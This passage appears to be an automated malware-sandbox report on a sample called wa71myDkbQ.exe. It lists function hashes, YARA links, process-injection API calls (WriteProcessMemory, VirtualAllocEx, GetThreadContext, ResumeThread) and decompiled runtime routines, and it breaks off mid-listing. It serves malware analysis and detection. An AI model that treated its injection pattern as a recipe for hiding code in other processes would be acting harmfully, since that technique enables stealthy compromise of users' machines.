API String ID: 1304948518-0
Opcode ID: 19ad41a46fce7d9accf5b0a9df4f1e3de1656611ab367c52cfe744fb0f841220
Instruction ID: ded52f8273553f15f85f9bdc0d94aae748e4356b4e8e1a3d10a0f819e44dec12
Opcode Fuzzy Hash: 19ad41a46fce7d9accf5b0a9df4f1e3de1656611ab367c52cfe744fb0f841220
Instruction Fuzzy Hash: 8C212AB1D01619DFDB10CF9AD4847EEFBF4AF88320F14816AE814A7341D7749A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C16358, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C163F0

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5cd998ea2e40fa767c60dc713eb262f56b0187e23158a03bc8cf1d0046ffa825
Instruction ID: ab4f311cb120da41138987eacae2a48c28b5e5a9daf961536f824a0ca8ef87df
Opcode Fuzzy Hash: 5cd998ea2e40fa767c60dc713eb262f56b0187e23158a03bc8cf1d0046ffa825
Instruction Fuzzy Hash: B02126719003599FCB10CFA9C884BDEBBF4FF48314F40842AE969A7240C774A955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C16360, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C163F0

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a20d67de9dfb62b23f432e721d0b4453410b5a1904df4a0b4a5183c134a0631a
Instruction ID: 1a4afe391c235f56b63992b7b62b33d08082666e79a0f8c920292fbd05172be2
Opcode Fuzzy Hash: a20d67de9dfb62b23f432e721d0b4453410b5a1904df4a0b4a5183c134a0631a
Instruction Fuzzy Hash: DC2115719003599FCB10CFA9C884BDEBBF5FF48314F50842AE969A7240C778A955DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C16940, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C169C8

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 02fddd36748ba8a2882e83c305955098714d8317fa6603b4e446e7e9786cc9a7
Instruction ID: fd4205d22d36b659e859b7140d80439f19327c6f332e0843678f2226c5008c77
Opcode Fuzzy Hash: 02fddd36748ba8a2882e83c305955098714d8317fa6603b4e446e7e9786cc9a7
Instruction Fuzzy Hash: EA2127B19013499FCB10CFA9C884AEEBBF1FF48314F10842AE559A7640C7749955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C15AE5, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 00C18698

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: ba468e4464658d7730bb643047f98d761ffe1858120d2eb1d32636a8bbef11e6
Instruction ID: 2b5a2eb0389f3385f28b6a7178d1f29ef3e266d81dbdbce09ab6d14745f747cb
Opcode Fuzzy Hash: ba468e4464658d7730bb643047f98d761ffe1858120d2eb1d32636a8bbef11e6
Instruction Fuzzy Hash: A02178719042098FDB10CF9AC844BEEBBF5EF88310F00842AE455A3290DB78A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C161C1, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 00C16246

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d4472f5080e133809a1a2a5b77c96196062a1331328105f74679877ca76c8812
Instruction ID: 6665efb34cf1d8fd4cbb13c3957bb5101cbdf39f245f7ab3c08f2da6ae365150
Opcode Fuzzy Hash: d4472f5080e133809a1a2a5b77c96196062a1331328105f74679877ca76c8812
Instruction Fuzzy Hash: 95213771D043098FDB10CFAAC484BEEBBF4AF88314F14842ED559A7641CB78A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C161C8, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 00C16246

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 2fb1b8328e6ee72e1c86e3dfd92302b91d52a6dc3cf69f87b42902d5a81846d4
Instruction ID: 82dae5fb3d3cb41b9e245c35fa3e9b0d3f1358e78ff6912067d54c0011f89a5d
Opcode Fuzzy Hash: 2fb1b8328e6ee72e1c86e3dfd92302b91d52a6dc3cf69f87b42902d5a81846d4
Instruction Fuzzy Hash: 4E213971D003098FDB10DFAAC484BEEBBF4AF88314F54842AD519A7240CB78A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C16948, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C169C8

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8b91008fb092e6e028269870c5f5bdb71cb084ac16d64b1f24519973ea18d544
Instruction ID: 53e7a58eb477375d2ab22bf4d9366ea8e2c675786d3065551b8a15ecb61bbd77
Opcode Fuzzy Hash: 8b91008fb092e6e028269870c5f5bdb71cb084ac16d64b1f24519973ea18d544
Instruction Fuzzy Hash: E72116B19003499FCB10CFAAC884AEEBBF5FF48314F50842AE519A7240C778A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C15AEC, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 00C18698

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 166ff078cfaa811ef2167d56ad68fd8eefa84f118c7298108a52868d86d68573
Instruction ID: 96e329fb19180219562909113f636407ffdef7a966b2e40d3a4a6aae174e0a09
Opcode Fuzzy Hash: 166ff078cfaa811ef2167d56ad68fd8eefa84f118c7298108a52868d86d68573
Instruction Fuzzy Hash: BC213571D04209CFDB14CF9AC844BEEBBF5EB88320F14842AE455A3350DB78A985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C17A80, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 00C17B03

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: cdc5bb04a5cdd19f074cae4d1242cded5f079c8bb04a37d2d4e35c505f9eeced
Instruction ID: 8be4b4565046bae4f579dde1726ce80522dba16568760f4297ea1e1dade0b1ba
Opcode Fuzzy Hash: cdc5bb04a5cdd19f074cae4d1242cded5f079c8bb04a37d2d4e35c505f9eeced
Instruction Fuzzy Hash: D221F3B1A052199FDB00CF9AD884BDEFBB4FB49324F00822AE518A7740D774A9408BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C18619, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 00C18698

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: a68dc5bb8755c4fc9a2d3aef765d3b0ccdec272f3e0fab23663d0b293186544b
Instruction ID: 25757940feb02aaacc643b96f873712812c493c6d82ee2b218374b3852643b9c
Opcode Fuzzy Hash: a68dc5bb8755c4fc9a2d3aef765d3b0ccdec272f3e0fab23663d0b293186544b
Instruction Fuzzy Hash: D9213A71D042098FDB14CF9AC844BEEBBF5EF88314F04842AD455A3350DB74A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C17A7B, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 00C17B03

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c2482543d7fd03e977f05854d71e8e88e1060fe2ac3bc369b776ac74ea18deb6
Instruction ID: e5fb6bd8c7b4e085ccc8c214034f02748a519cd37f2d6e7f0bbe318a0c5bdf5a
Opcode Fuzzy Hash: c2482543d7fd03e977f05854d71e8e88e1060fe2ac3bc369b776ac74ea18deb6
Instruction Fuzzy Hash: 8E2157B1E042599FDB00CF99C884BDEFBB4BF09314F04812AE418A7340D774A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C181E8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00C1825B

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: bf49fd957d0dc5f9b74204579767407b12d979e389d057059a5514dbcbd089d4
Instruction ID: 8995b7d22970030ddd060ac9b048b70c483b2309e3184727b958ba00f0955171
Opcode Fuzzy Hash: bf49fd957d0dc5f9b74204579767407b12d979e389d057059a5514dbcbd089d4
Instruction Fuzzy Hash: DA2108B5904609DFCB10CF9AC484BDEBBF4EF48320F108429E568A7340D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C16298, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C1630E

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: df3766ad0824117ea1f3b33186dec29b7388c9b0f8fb5dae946d05d48b350b8f
Instruction ID: b1573fa7d9a9bc6907f94f299f1e616f9f286ca66f20e6db24663989ecfad8da
Opcode Fuzzy Hash: df3766ad0824117ea1f3b33186dec29b7388c9b0f8fb5dae946d05d48b350b8f
Instruction Fuzzy Hash: ED1147719042498FCF10CFA9C844BEEBBF5AF88314F14881AE525A7650CB759945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C162A0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C1630E

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 82b9f51f6d1e88bf0010e1435ba5f9d901abe584b6343c56e0e25a4f68e75b49
Instruction ID: 8a3c0945de01ec275bcbb6237cccbeeced517c758b94b6d9d5c2715ea5c64036
Opcode Fuzzy Hash: 82b9f51f6d1e88bf0010e1435ba5f9d901abe584b6343c56e0e25a4f68e75b49
Instruction Fuzzy Hash: 001126719002499FDF10DFAAC844BDEBBF5EF88324F14881AE525A7250CB75A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C16111, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00C1617A

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a1b770ff995a8286fec1086c0a768bdf2194e7d99cb66ff961cd73c5484c14bf
Instruction ID: f875b81053554edb712f9a983c08b71531f61036d000991d97f881c46c090f32
Opcode Fuzzy Hash: a1b770ff995a8286fec1086c0a768bdf2194e7d99cb66ff961cd73c5484c14bf
Instruction Fuzzy Hash: C11146B1D043498FDB24CFAAC444BEEBBF4AF88324F14881ED41AA7640CB75A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C16118, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00C1617A

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 83fdbcaeeb246c3e57770a9e2a909468a0a8c88b1004303c8414e997393b52a1
Instruction ID: 7cf560b1e2d108136e076c812161db1424817864e292f284bd48acb1ab42f1f2
Opcode Fuzzy Hash: 83fdbcaeeb246c3e57770a9e2a909468a0a8c88b1004303c8414e997393b52a1
Instruction Fuzzy Hash: DC1125B1D043498FDB10DFAAC444BEEFBF4AB88324F14881AD519A7640CB75A985CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003639A2, Relevance: 5.0, Strings: 2, Instructions: 2517COMMON

Download Yara Rule

Strings

,, xrefs: 00364581
v4.0, xrefs: 00364507

Memory Dump Source

Source File: 00000000.00000002.350395037.0000000000332000.00000002.00020000.sdmp, Offset: 00330000, based on PE: true

Associated: 00000000.00000002.350384513.0000000000330000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ,$v4.0
API String ID: 0-3037030054
Opcode ID: 3e617879ba18f92095e66e511962978b6302cb04f9c1a817d0b7928ebd1e6d2d
Instruction ID: cc6e3c4b6bb8af2bb1fd2c2ebcc3e4cc2d9b413da82612d2566a07d3df3b5ba1
Opcode Fuzzy Hash: 3e617879ba18f92095e66e511962978b6302cb04f9c1a817d0b7928ebd1e6d2d
Instruction Fuzzy Hash: 6BE2BB2684E3D14FCB178B708976191BFB1AE2321471EC6CFC4C18F4BBE219991AC766

Uniqueness

Uniqueness Score: -1.00%

Function 00C13648, Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

TB{, xrefs: 00C136CC
, xrefs: 00C1375E

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: $TB{
API String ID: 0-3666291774
Opcode ID: f58fbe188b13eb3eb35e5d59875a03cb73181d9830dbe6e2aadbadf3eaa8c351
Instruction ID: 5cadb440551311931c7d818554ff9a99af159d4392edc777709fd07c420cf525
Opcode Fuzzy Hash: f58fbe188b13eb3eb35e5d59875a03cb73181d9830dbe6e2aadbadf3eaa8c351
Instruction Fuzzy Hash: B851E0B5F001158FCB14DF69C884AAEB7E2EBCA325B158579D519CB754DB30EE818BC0

Uniqueness

Uniqueness Score: -1.00%

Function 00C12A33, Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

,LJl, xrefs: 00C12F4B

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: ,LJl
API String ID: 0-4239536578
Opcode ID: a2e1404fabe64ca384a58b6a7f4c9349c085c531f424c97d5d7d70ca439f50a6
Instruction ID: 367910635996f65eee76ca24d6e8d7d364cb3a34157c3c58a399143746f829aa
Opcode Fuzzy Hash: a2e1404fabe64ca384a58b6a7f4c9349c085c531f424c97d5d7d70ca439f50a6
Instruction Fuzzy Hash: 7FE1B034A042688FDB14CFA9C880AADFBF2BF8A305F18C5A9D0599B745D7349E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C12B22, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77753c08838b6306875e7f4593a6cadfcce9be46384ad95ec728fdd2d8f0dcc5
Instruction ID: cc864cba3031b73dff2be7648ccfbf8c1d53d15bb7c0234feec1847da0d1e80d
Opcode Fuzzy Hash: 77753c08838b6306875e7f4593a6cadfcce9be46384ad95ec728fdd2d8f0dcc5
Instruction Fuzzy Hash: 0B91A374E046288FDB14CFA9C880AEDB7B2BF89304F29C5A8D015AB745D734AD91DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C133C1, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a2cbb84aa231a6b3f1aa1a34018674d0446df325d6077e7020b70adefb8a4e
Instruction ID: cd3dee90ecd490a50ccbc143f69fe272b46cd39e0c4d920db98bb5f2ca57b87b
Opcode Fuzzy Hash: 73a2cbb84aa231a6b3f1aa1a34018674d0446df325d6077e7020b70adefb8a4e
Instruction Fuzzy Hash: 46614832F111648FD714DB69DC80A9EB3A3AFC8714F1AC164E4099BB69DF35ED418B90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wa71myDkbQ.exe PID: 3188 Parent PID: 3192 wa71myDkbQ.exeCOMMON

Executed Functions

Function 00415B9F, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415B9F(int _a4) {
				void* _t14;

				if(E0041A41E(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00415C24(_t14, _a4);
				ExitProcess(_a4);
			}

0x00415bab
0x00415bc7
0x00415bc7
0x00415bd0
0x00415bd9

APIs

GetCurrentProcess.KERNEL32(?,?,00415B75,?,00436360,0000000C,00415CCC,?,00000002,00000000), ref: 00415BC0
TerminateProcess.KERNEL32(00000000,?,00415B75,?,00436360,0000000C,00415CCC,?,00000002,00000000), ref: 00415BC7
ExitProcess.KERNEL32 ref: 00415BD9

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8735d6ce8934401df57c84cedfcd28b8eb0f5e0293cafe04f99b8140e9199501
Instruction ID: bdcb75ce00b294669b0066601f88168bb2cff9aca7268ff39802461fe6a5f301
Opcode Fuzzy Hash: 8735d6ce8934401df57c84cedfcd28b8eb0f5e0293cafe04f99b8140e9199501
Instruction Fuzzy Hash: 4EE04635104648EFCF216F10DD0AED93B79FF80385B400829F8149B222DB39EC92CA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040B16A, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B16A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040B176); // executed
				return _t1;
			}

0x0040b16f
0x0040b175

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000B176,0040AD29), ref: 0040B16F

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9a59b99703bd14b91e960a2ec1e08961de074913c05ce437d59bb151f99e761a
Instruction ID: 0de72eb9288912c38200b749dcd67f10772ec1154a3281ad7d9cdb773cc8ed7b
Opcode Fuzzy Hash: 9a59b99703bd14b91e960a2ec1e08961de074913c05ce437d59bb151f99e761a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004230C2, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004230C2(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E00422E96(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E0041F357(_t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E00422E01(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0041F2A0(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x439a78 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E00422BB4(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x439a78 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E00422E01();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x439a78 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E00413BF7(GetLastError());
											 *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0041F469( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E00423012(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E00419904(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E00413BF7(_t271);
							 *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x439a78 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00413C2D())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x439a78 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00413BF7(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E00422E01();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00413C1A()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E00413C2D())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00413C1A()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00413C2D()));
				}
			}

0x004230c2
0x004230e5
0x004230e9
0x004230ea
0x004230ea
0x004230ea
0x004230ec
0x004230f2
0x0042310d
0x00423112
0x00423115
0x00423117
0x00423119
0x00423138
0x0042313f
0x00423146
0x00423149
0x00423155
0x00423158
0x00423160
0x00423161
0x00423164
0x00423164
0x00423166
0x0042316b
0x0042316d
0x00423170
0x00423178
0x0042317b
0x004231e8
0x004231e9
0x004231ef
0x004231f1
0x0042323a
0x0042323d
0x00423246
0x00423249
0x0042324c
0x0042324e
0x0042324e
0x0042324e
0x0042323f
0x00423242
0x00423242
0x00423253
0x00423256
0x00423262
0x00423267
0x00423273
0x0042327d
0x00423281
0x0042328b
0x0042328e
0x00423299
0x0042329e
0x004232ae
0x004232b1
0x004232b5
0x004232b6
0x004232bc
0x004232c1
0x004232c4
0x004232c6
0x004232c8
0x004232cd
0x004232d0
0x004232d2
0x004232fc
0x00423320
0x00423324
0x00423328
0x0042332a
0x0042332e
0x00423330
0x0042333a
0x0042333d
0x00423344
0x00423344
0x00423344
0x00423344
0x0042332e
0x00423349
0x00423355
0x00423357
0x004233e2
0x004233e2
0x00000000
0x0042335d
0x0042335d
0x00423361
0x00000000
0x00000000
0x00423366
0x00423378
0x00423380
0x00423383
0x00423384
0x00423387
0x0042338e
0x00423393
